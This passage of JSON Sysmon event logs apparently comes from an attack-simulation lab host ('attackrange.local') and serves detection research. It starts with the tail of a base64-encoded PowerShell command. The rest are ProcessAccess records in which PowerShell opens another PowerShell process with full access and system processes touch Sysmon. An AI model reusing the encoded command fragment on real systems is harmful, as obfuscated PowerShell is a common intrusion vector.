AHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4739,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.755\r\nSourceProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010B3720600}\r\nSourceProcessId: 4480\r\nSourceThreadId: 4976\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A17E0600}\r\nTargetProcessId: 1576\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98372ed6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97813fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97813c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+982c5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977d4817(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97832ce6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9781634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9781634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978161dc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97808161(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97814694(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97814287(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97813fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97813c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+982c5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977faae2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977fa0b2(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.755","SourceProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010B3720600}","SourceProcessId":"4480","SourceThreadId":"4976","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A17E0600}","TargetProcessId":"1576","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98372ed6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97813fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97813c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+982c5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977d4817(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97832ce6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9781634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9781634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978161dc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97808161(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97814694(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97814287(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97813fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97813c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+982c5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977faae2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977fa0b2(wow64)","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4740,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.755\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A17E0600}\r\nTargetProcessId: 1576\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.755","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A17E0600}","TargetProcessId":"1576","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4741,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.755\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.755","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4742,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.755\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.755","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4743,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.755\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.755","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4744,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.755\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.755","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4745,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.755\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 